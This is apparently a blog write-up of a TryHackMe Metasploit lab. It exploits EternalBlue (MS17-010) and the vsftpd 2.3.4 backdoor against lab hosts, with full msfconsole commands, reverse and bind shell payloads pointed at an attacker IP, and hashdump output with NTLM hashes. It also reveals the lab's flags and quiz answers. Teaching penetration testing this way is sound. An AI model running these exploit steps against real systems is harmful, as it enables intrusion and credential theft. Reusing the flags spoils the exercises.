   58  auxiliary/fuzzers/smb/smb_negotiate_corrupt                     .                normal  No     SMB Negotiate Dialect Corruption
   59  auxiliary/fuzzers/smb/smb2_negotiate_corrupt                    .                normal  No     SMB Negotiate SMB2 Dialect Corruption
   60  auxiliary/admin/smb/change_password                             .                normal  No     SMB Password Change
   61    \_ action: CHANGE                                             .                .       .      Change the password, knowing the existing one. New AES kerberos keys will be generated.
   62    \_ action: CHANGE_NTLM                                        .                .       .      Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
   63    \_ action: RESET                                              .                .       .      Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
   64    \_ action: RESET_NTLM                                         .                .       .      Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
   65  auxiliary/scanner/smb/smb_lookupsid                             .                normal  No     SMB SID User Enumeration (LookupSid)
   66    \_ action: DOMAIN                                             .                .       .      Enumerate domain accounts
   67    \_ action: LOCAL                                              .                .       .      Enumerate local accounts
   68  auxiliary/admin/smb/check_dir_file                              .                normal  No     SMB Scanner Check File/Directory Utility
   69  auxiliary/scanner/smb/pipe_auditor                              .                normal  No     SMB Session Pipe Auditor
   70  auxiliary/scanner/smb/pipe_dcerpc_auditor                       .                normal  No     SMB Session Pipe DCERPC Auditor
   71  auxiliary/scanner/smb/smb_enumshares                            .                normal  No     SMB Share Enumeration
   72  auxiliary/fuzzers/smb/smb_tree_connect_corrupt                  .                normal  No     SMB Tree Connect Request Corruption
   73  auxiliary/fuzzers/smb/smb_tree_connect                          .                normal  No     SMB Tree Connect Request Fuzzer
   74  auxiliary/scanner/smb/smb_enumusers                             .                normal  No     SMB User Enumeration (SAM EnumUsers)
   75  auxiliary/scanner/smb/smb_version                               .                normal  No     SMB Version Detection
   76  auxiliary/server/relay/relay_get_naa_credentials                .                normal  Yes    SMB to HTTP relay version of Get NAA Creds
   77  auxiliary/dos/smb/smb_loris                                     2017-06-29       normal  No     SMBLoris NBSS Denial of Service
   78  auxiliary/scanner/snmp/snmp_enumshares                          .                normal  No     SNMP Windows SMB Share Enumeration
   79  auxiliary/admin/smb/samba_symlink_traversal                     .                normal  No     Samba Symlink Directory Traversal
   80  auxiliary/scanner/smb/smb_uninit_cred                           .                normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   81  auxiliary/dos/samba/read_nttrans_ea_list                        .                normal  No     Samba read_nttrans_ea_list Integer Overflow
   82  auxiliary/fileformat/specialfolder_leak                         2025-05-10       normal  No     SpecialFolderDatablock - Windows LNK File Special UNC Path NTLM Leak
   83  auxiliary/server/teamviewer_uri_smb_redirect                    .                normal  No     TeamViewer Unquoted URI Handler SMB Redirect
   84  auxiliary/scanner/smb/impacket/wmiexec                          2018-03-19       normal  No     WMI Exec
   85  auxiliary/admin/smb/webexec_command                             .                normal  No     WebEx Remote Command Execution Utility
   86  auxiliary/fileformat/multidrop                                  .                normal  No     Windows SMB Multi Dropper

After running a vulnerability scanner module, what msfconsole command displays the vulnerabilities stored in the database? vulns

Exploit 1: EternalBlue (MS17-010)

EternalBlue targets a buffer overflow vulnerability in Microsoft's SMBv1 implementation. We confirmed the host is vulnerable in the previous task. Let's exploit it.

Step 1: Search and Select

msf6 > search eternalblue type:exploit

Matching Modules
================

 #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
[...]

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Metasploit selected windows/x64/meterpreter/reverse_tcp as the default payload. This is a staged Meterpreter payload that will give us a full-featured interactive session on the target.

Step 2: Configure

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

 Name           Current Setting  Required  Description
 ----           ---------------  --------  -----------
 RHOSTS         MACHINE_IP       yes       The target host(s), [...]
 RPORT          445              yes       The target port (TCP)
 [...]

Payload options (windows/x64/meterpreter/reverse_tcp):

 Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
 EXITFUNC  thread           yes       Exit technique [...]
 LHOST     ATTACKER_IP      yes       The listen address
 LPORT     4444             yes       The listen port

msf6 exploit(windows/smb/ms17_010_eternalblue) >

Verify that LHOST is set to your AttackBox or Kali machine's IP address. If it is not correct (common when multiple network interfaces are present), set it manually with set LHOST CONNECTION_IP.

Step 3: Exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on CONNECTION_IP:4444
[*] MACHINE_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] MACHINE_IP:445 - Host is likely VULNERABLE to MS17-010!
[*] MACHINE_IP:445 - Connecting to target for exploitation.
[+] MACHINE_IP:445 - Connection established for exploitation.
[+] MACHINE_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] MACHINE_IP:445 - Trying exploit with 12 Groom Allocations.
[*] MACHINE_IP:445 - Sending all but last fragment of exploit packet
[*] Sending stage (201283 bytes) to MACHINE_IP
[*] Meterpreter session 1 opened (CONNECTION_IP:4444 -> MACHINE_IP:49186) at 2026-03-18 15:45:22 +0000

meterpreter >

We have a Meterpreter session on STRATFORD-WS01. Let's verify our access level and retrieve the flag:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
 c:\flag.txt (24 bytes)
meterpreter > cat c:\\Users\\Administrator\\Desktop\\flag.txt
THM-REDACTED
meterpreter >

We landed as NT AUTHORITY\SYSTEM, the highest privilege level on a Windows system. EternalBlue is a kernel-level exploit, so it bypasses normal user privilege boundaries entirely.

Let's also extract password hashes before moving on. The hashdump command retrieves local user account hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
meterpreter >

We can see a user account named pirate with an NTLM hash. We will explore hash cracking and post-exploitation in depth in the Post-Exploitation room. For now, background this session so we can exploit the second target:

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Answer the questions below

What is the content of the flag.txt file on STRATFORD-WS01?

msf > search eternalblue type:exploit

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   20    \_ target: Execute payload (x64)             .                .        .      .
   21    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 21, use 21 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.113.138.21
RHOSTS => 10.113.138.21
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.113.138.21    yes       The target host(s), see
                                             https://docs.metasploit.
                                             com/docs/using-metasploi
                                             t/basics/using-metasploi
                                             t.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows d
                                             omain to use for authent
                                             ication. Only affects Wi
                                             ndows Server 2008 R2, Wi
                                             ndows 7, Windows Embedde
                                             d Standard 7 target mach
                                             ines.
   SMBPass                         no        (Optional) The password
                                             for the specified userna
                                             me
   SMBUser                         no        (Optional) The username
                                             to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architec
                                             ture matches exploit Tar
                                             get. Only affects Window
                                             s Server 2008 R2, Window
                                             s 7, Windows Embedded St
                                             andard 7 target machines
                                             .
   VERIFY_TARGET  true             yes       Check if remote OS match
                                             es exploit Target. Only
                                             affects Windows Server 2
                                             008 R2, Windows 7, Windo
                                             ws Embedded Standard 7 t
                                             arget machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '',
                                         seh, thread, process, none)
   LHOST     10.113.67.191    yes       The listen address (an interf
                                        ace may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.113.67.191:4444 
[*] 10.113.138.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.113.138.21:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 10.113.138.21:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.113.138.21:445 - The target is vulnerable.
[*] 10.113.138.21:445 - Connecting to target for exploitation.
[+] 10.113.138.21:445 - Connection established for exploitation.
[+] 10.113.138.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.113.138.21:445 - CORE raw buffer dump (53 bytes)
[*] 10.113.138.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.113.138.21:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 10.113.138.21:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
[*] 10.113.138.21:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 10.113.138.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.113.138.21:445 - Trying exploit with 12 Groom Allocations.
[*] 10.113.138.21:445 - Sending all but last fragment of exploit packet
[*] 10.113.138.21:445 - Starting non-paged pool grooming
[+] 10.113.138.21:445 - Sending SMBv2 buffers
[+] 10.113.138.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.113.138.21:445 - Sending final SMBv2 buffers.
[*] 10.113.138.21:445 - Sending last fragment of exploit packet!
[*] 10.113.138.21:445 - Receiving response from exploit packet
[+] 10.113.138.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.113.138.21:445 - Sending egg to corrupted connection.
[*] 10.113.138.21:445 - Triggering free of corrupted buffer.
[*] Sending stage (248902 bytes) to 10.113.138.21
[*] Meterpreter session 1 opened (10.113.67.191:4444 -> 10.113.138.21:49161) at 2026-05-25 19:14:17 +0000
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.113.138.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
=================

Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\flag.txt  17            2026-04-24 05:37:47 +0000

meterpreter > cat c:\\Users\\Administrator\\Desktop\\flag.txt
THM{EterNalPwn3d} 

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cc37474302208881eac96efdb606b033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1003:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::

What is the NTLM hash of the pirate user on STRATFORD-WS01?

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cc37474302208881eac96efdb606b033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1003:aad3b435b51404eeaad3b435b51404ee:3b1da22b1973c0bb86d4a9b6a9ae65f6:::

Exploit 2: vsftpd 2.3.4 Backdoor

Now for something completely different. In 2011, the vsftpd 2.3.4 source code distribution was found to contain a backdoor that an unknown attacker had inserted into the download archive. When a user connects to the FTP service and sends a username ending with :) (a smiley face), the backdoor opens a command shell listening on port 6200. This is not a buffer overflow or a logic flaw; it is deliberately planted malicious code.

Let's find the Metasploit module:

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

msf6 > use 1
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Notice two differences from EternalBlue. First, the rank is excellent (compared to EternalBlue's average), meaning this exploit is expected to work reliably without crashing the service. Second, the default payload is cmd/unix/interact, a basic interactive shell, not Meterpreter. This is because the backdoor opens a simple command channel, not a reflective DLL injection point.

Configure and Exploit:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] MACHINE_IP:21 - Banner: 220 (vsFTPd 2.3.4)
[*] MACHINE_IP:21 - USER: 331 Please specify the password.
[+] MACHINE_IP:21 - Backdoor service has been spawned, handling...
[+] MACHINE_IP:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (ATTACKER_IP:42069 -> MACHINE_IP:6200) at 2026-03-18 15:52:38 +0000

id
uid=0(root) gid=0(root)
whoami
root
hostname
stratford-srv01

We have root access on the Linux server. Notice the differences from the EternalBlue exploitation:

  • The prompt is a raw shell, not meterpreter >. There is no prompt prefix at all; we are interacting directly with the target's shell.

  • The session type is Command shell (session 2), not Meterpreter. No staged payload was downloaded.

  • The backdoor itself provided the command execution channel.

Comparing the Two Exploits

Dimension EternalBlue vsftpd 2.3.4
Target service SMB (port 445) FTP (port 21)
Target OS Windows 7 Ubuntu Linux
Vulnerability type Buffer overflow in SMBv1 Planted backdoor in source code
Exploit rank Average Excellent
Default payload windows/x64/meterpreter/reverse_tcp (staged) cmd/unix/interact (single)
Session type Meterpreter Command shell
Privilege level NT AUTHORITY\SYSTEM root
Check support Yes No

The comparison reinforces the core point: the Metasploit workflow is protocol-agnostic. Whether you are exploiting a Windows kernel vulnerability over SMB or triggering a backdoor in an FTP daemon on Linux, the operational steps are identical: search, use, set, exploit.

Answer the questions below

What Metasploit module exploits the vsftpd 2.3.4 backdoor? exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(unix/ftp/vsftpd_234_backdoor) > unset -g payload
Unsetting payload...

What user are you running as on stratford-srv01 after exploitation? root

msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload generic/shel_bind_tcp
[-] The value specified for payload is not valid.
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 6200
RPORT => 6200
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] Started reverse TCP handler on 10.114.98.170:4444 
[*] 10.114.157.64:6200 - Running automatic check ("set AutoCheck false" to disable)
[-] 10.114.157.64:6200 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.114.157.64:6200).
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/vsftpd_234_backdoor) > unset RPORT 6200
Unsetting RPORT...
Unsetting 6200...
[!] Variable "RPORT" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear RPORT
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.114.157.64:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.114.157.64:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[+] 10.114.157.64:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[+] 10.114.157.64:21 - Backdoor has been spawned!
[*] Started bind TCP handler against 10.114.157.64:4444
[*] Command shell session 2 opened (10.114.98.170:43841 -> 10.114.157.64:4444) at 2026-05-25 19:51:33 +0000

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
stratford-srv01

What are the contents of /root/flag.txt

ls
bin
bin.usr-is-merged
boot
core
dev
etc
home
juziKAARAev
lib
lib.usr-is-merged
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
sbin.usr-is-merged
snap
srv
sys
tmp
usr
var
cat /root/flag.txt
THM-MSFv3n0m-PAYLOAD

Conclusion

In this room, you took the foundational skills from the Introduction room and applied them against live targets on the Stratford Systems network. Let's recap the workflow you practiced:

  1. Scanning: You used Metasploit's built-in port scanning modules and Nmap (both directly and via db_nmap) to discover open ports and identify running services across two target hosts.

  2. Database management: You set up and used the Metasploit database to store scan results, query hosts and services, manage credentials, and automatically populate module parameters with hosts -R and services -R. Workspaces let you isolate engagement data cleanly.

  3. Vulnerability identification: You ran targeted scanner modules, confirmed that STRATFORD-WS01 was vulnerable to MS17-010, and identified the vsftpd 2.3.4 backdoor on both hosts. Results were automatically recorded in the database's vulns table.

  4. Exploitation: You exploited two fundamentally different vulnerabilities, a Windows SMB buffer overflow (EternalBlue) and a Linux FTP backdoor (vsftpd 2.3.4), using the same operational pattern. You gained SYSTEM-level access on Windows and root on Linux, retrieved a flag, and extracted password hashes.

The most important takeaway from this room is not any single command or module. It is the pattern: scan → store → identify → exploit. That four-step cycle applies to every Metasploit engagement, regardless of the target OS, protocol, or vulnerability type.

You now have two active sessions on the Stratford network: a Meterpreter session on STRATFORD-WS01 and a command shell on stratford-srv01. In the next room, Metasploit: Post-Exploitation, you will learn what to do with those sessions: post-exploitation commands, privilege management, credential harvesting, file system exploration, and more.

It is time to move on to the next room: Metasploit: Post-Exploitation.

#metasploit#exploitation#scanning#privilege-escalation#cve#tryhackme

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

485 posts